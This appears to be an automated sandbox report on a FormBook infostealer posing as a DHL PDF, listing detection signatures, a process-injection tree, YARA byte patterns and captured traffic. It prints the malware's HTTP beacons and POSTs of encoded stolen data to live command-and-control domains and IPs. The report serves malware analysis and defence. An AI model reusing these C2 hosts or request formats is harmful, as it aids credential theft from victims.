Loading ...

Play interactive tourEdit tour

Analysis Report DHL PACKAGE - PDF.exe

Overview

General Information

Sample Name:DHL PACKAGE - PDF.exe
Analysis ID:286161
MD5:863bf0dfa1169706f566c070a1e11256
SHA1:77175726680e40eeefdad0578a1d3377486d9fff
SHA256:a102b644fd134778f28e1105e4645e84ff4d05687351990de90ae27a89f0513b

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • DHL PACKAGE - PDF.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe' MD5: 863BF0DFA1169706F566C070A1E11256)
    • rundll32.exe (PID: 7016 cmdline: rundll32.exe SitulaCystocele,Hurley MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 7040 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • NETSTAT.EXE (PID: 4912 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 7044 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.cmd.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.cmd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.cmd.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18339:$sqlite3step: 68 34 1C 7B E1
        • 0x1844c:$sqlite3step: 68 34 1C 7B E1
        • 0x18368:$sqlite3text: 68 38 2A 90 C5
        • 0x1848d:$sqlite3text: 68 38 2A 90 C5
        • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.cmd.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.cmd.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: DHL PACKAGE - PDF.exeAvira: detected
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dllVirustotal: Detection: 10%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dllReversingLabs: Detection: 16%
          Multi AV Scanner detection for submitted fileShow sources
          Source: DHL PACKAGE - PDF.exeVirustotal: Detection: 49%Perma Link
          Source: DHL PACKAGE - PDF.exeReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: DHL PACKAGE - PDF.exeJoe Sandbox ML: detected
          Source: 4.2.cmd.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10001048 RegDeleteValueA,RegSaveKeyA,WSAAsyncGetServByName,CryptHashData,SwitchToFiber,GetLogicalDriveStringsA,GetNumberOfEventLogRecords,GetTapeStatus,GlobalFree,SetProcessShutdownParameters,WaitForSingleObjectEx,RegLoadKeyA,CryptDestroyHash,UnmapViewOfFile,UnlockFile,GetModuleHandleA,GetProcAddress,GetProcAddress,VirtualAlloc,VirtualAlloc,GetModuleHandleA,2_2_10001048
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_00406469 FindFirstFileA,FindClose,0_2_00406469
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040592E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10001048 RegDeleteValueA,RegSaveKeyA,WSAAsyncGetServByName,CryptHashData,SwitchToFiber,GetLogicalDriveStringsA,GetNumberOfEventLogRecords,GetTapeStatus,GlobalFree,SetProcessShutdownParameters,WaitForSingleObjectEx,RegLoadKeyA,CryptDestroyHash,UnmapViewOfFile,UnlockFile,GetModuleHandleA,GetProcAddress,GetProcAddress,VirtualAlloc,VirtualAlloc,GetModuleHandleA,2_2_10001048
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop ebx4_2_00407B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi4_2_0040E42D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi4_2_00417C93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx20_2_00DD7B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi20_2_00DE7C93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi20_2_00DDE42D

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.4:49738
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.shopendora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.3rdimultimedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.64 23.227.38.64
          Source: Joe Sandbox ViewIP Address: 23.227.38.64 23.227.38.64
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: POST /c232/ HTTP/1.1Host: www.3rdimultimedia.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.3rdimultimedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3rdimultimedia.com/c232/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw).
          Source: global trafficHTTP traffic detected: POST /c232/ HTTP/1.1Host: www.3rdimultimedia.comConnection: closeContent-Length: 188456Cache-Control: no-cacheOrigin: http://www.3rdimultimedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3rdimultimedia.com/c232/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 3d 6d 50 37 74 75 4d 38 75 56 4f 77 34 4b 48 31 4f 38 71 7e 6f 69 67 54 4c 67 52 7a 33 56 5f 6b 51 7a 4e 61 58 7a 41 7e 47 64 68 34 4e 78 79 62 42 55 4a 63 68 34 76 36 38 62 56 6b 78 28 46 71 33 47 44 4c 41 76 37 31 6a 5a 37 38 72 4c 75 36 54 45 77 4e 44 6b 79 52 72 6b 37 64 59 48 52 52 65 77 7a 44 61 53 6e 76 59 4e 66 68 70 5a 4c 71 36 4b 61 62 34 76 4e 67 51 6f 5a 38 67 68 5f 34 53 49 65 61 70 39 6e 73 67 67 79 55 63 77 44 4a 6e 77 39 35 73 4d 6b 43 72 62 72 30 74 6f 2d 5a 4d 61 6d 50 52 63 37 73 69 53 33 58 4f 45 76 6f 55 30 74 56 59 4f 78 5a 58 67 37 30 76 75 77 49 65 51 50 37 62 28 67 32 35 57 63 47 73 45 75 52 45 36 6e 4a 38 39 4b 72 79 46 57 4a 4a 44 31 56 42 4b 7a 67 43 75 4d 77 4f 4b 49 4e 72 47 31 50 32 63 73 56 6e 72 58 6d 4b 52 38 4b 49 62 37 73 66 48 50 48 45 54 4b 70 58 45 65 4d 52 78 2d 6c 70 68 79 7a 61 68 35 70 55 4b 6c 5a 50 76 50 33 54 79 52 59 66 6f 7a 63 44 49 72 6b 5f 79 47 6d 72 78 59 4a 64 52 33 63 76 4d 2d 78 39 70 74 65 6f 48 64 49 6c 73 74 6a 54 7e 4d 6c 74 41 64 65 5f 7a 4f 78 71 50 31 6d 61 30 75 45 71 79 61 73 45 4a 4a 38 57 74 37 63 7a 47 48 73 6b 77 43 53 48 6e 32 71 30 66 41 6e 6b 52 4c 50 2d 64 4e 48 58 71 77 43 6e 74 6a 30 44 6d 45 78 52 4e 50 74 61 6f 57 4b 70 50 7a 28 35 6d 70 78 4b 62 49 4a 49 55 51 77 44 28 6a 38 35 33 56 48 38 6e 62 6d 48 78 34 30 51 5a 62 33 55 4b 49 30 35 61 31 6a 54 38 78 57 64 4e 36 42 37 43 45 32 76 6a 4d 59 67 4e 6b 79 4f 48 4f 64 42 70 30 4c 61 55 6e 7e 56 4d 62 61 58 34 4e 76 69 32 64 46 64 75 4a 33 6d 32 47 46 6b 4f 4b 6c 41 78 73 67 74 53 6d 7a 67 77 7a 45 41 75 35 64 4c 68 48 38 61 28 45 39 30 45 55 31 6d 66 33 51 30 4f 31 79 5f 51 58 62 30 59 5a 67 43 6f 64 7e 57 36 37 49 33 76 62 7a 36 4c 75 67 43 7e 54 50 6b 61 48 28 6f 64 70 38 44 79 58 79 52 4f 72 65 75 4b 67 4e 70 74 2d 46 72 6a 64 34 36 78 48 53 2d 32 4d 41 74 68 61 4f 45 47 41 61 66 31 44 41 5a 38 36 6e 72 70 6a 5a 42 37 62 33 51 51 62 69 45 4d 55 31 39 50 63 32 6a 71 75 33 39 57 49 69 53 6b 71 65 6a 5a 4a 4a 41 50 41 72 79 75 44 70 7a 59 35 4e 6e 4e 54 44 59 50 75 4b 79 6f 5f 50 67 73 4a 44 53 64 61 64 75 73 31 4f 73 76 74 4b 61 66 37 43 4a 76 6a 36 4a 6b 6a 37 68 6f 49 75 45 56 4b 66 67 58 55 38 77 4f 77 35 30 33 75 46 35 36 45 4d 33 54 79 7a 34 37 58 65 45 54 57 47 47 39 6d 28 77 7e 4d 42 75 32 6c 58 58 68 7a 64 37 32 4e 39 72 6f 55 7a 4a 6d 58 48 49 70 4a 44 59 6a 66 67 59 49 4d 64 6f 69 31 38 42 6d 4e 33 4d 4a 77 34 6c 79 64 4c 70 75 75 44 65 32 42 71 33 6d 57 68 79 67 66 6a 43 6b 57 46 61 58 58 6e 75 67 37 66 62 52 70 67 43 4c 38 4b 36 6b 6e 56 39 32 53 6b 5a 77 4c 66 56 37 34 72 75 46 74 39 4d 32
          Source: global trafficHTTP traffic detected: GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.shopendora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.3rdimultimedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.shopendora.com
          Source: unknownHTTP traffic detected: POST /c232/ HTTP/1.1Host: www.3rdimultimedia.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.3rdimultimedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3rdimultimedia.com/c232/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw).
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: r2400.xml.0.drString found in binary or memory: http://gimp-print.sourceforge.net/xsd/gp.xsd-1.0
          Source: reportobjectbar.xml.0.drString found in binary or memory: http://mozilla.org/MPL/2.0/.
          Source: DHL PACKAGE - PDF.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: DHL PACKAGE - PDF.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: nsxD96C.tmp.0.drString found in binary or memory: http://openoffice.org/2001/menu
          Source: reportobjectbar.xml.0.drString found in binary or memory: http://openoffice.org/2001/toolbar
          Source: NETSTAT.EXE, 00000014.00000002.510534189.0000000003E49000.00000004.00000001.sdmpString found in binary or memory: http://www.3rdimultimedia.com
          Source: NETSTAT.EXE, 00000014.00000002.510534189.0000000003E49000.00000004.00000001.sdmpString found in binary or memory: http://www.3rdimultimedia.com/c232/
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp, reportobjectbar.xml.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: nsxD96C.tmp.0.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: nsxD96C.tmp.0.drString found in binary or memory: http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd
